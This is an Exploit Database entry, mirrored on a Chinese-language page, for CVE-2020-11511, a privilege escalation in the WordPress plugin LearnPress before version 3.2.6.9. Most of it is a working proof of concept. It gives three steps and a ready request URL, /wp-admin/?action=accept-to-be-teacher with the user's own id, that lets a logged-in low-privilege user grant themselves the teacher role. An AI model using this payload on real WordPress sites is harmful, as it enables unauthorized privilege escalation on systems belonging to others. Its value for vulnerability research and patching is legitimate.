WordPress Plugin LearnPress 3.2.6.8 – Privilege Escalation

• Exploit Database
• 35 阅读

• 作者： nhattruong
  日期： 2021-07-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50138/

• # Exploit Title: WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation
  # Date: 07-17-2021
  # Exploit Author: nhattruong or nhattruong.blog
  # Vendor Homepage: https://thimpress.com/learnpress/
  # Software Link: https://wordpress.org/plugins/learnpress/
  # Version: < 3.2.6.9
  # References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd
  # CVE: CVE-2020-11511
  
  POC:
  1. Find out your user id
  2. Login with your cred
  3. Execute the payload
  
  
  http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>
  
  # Done!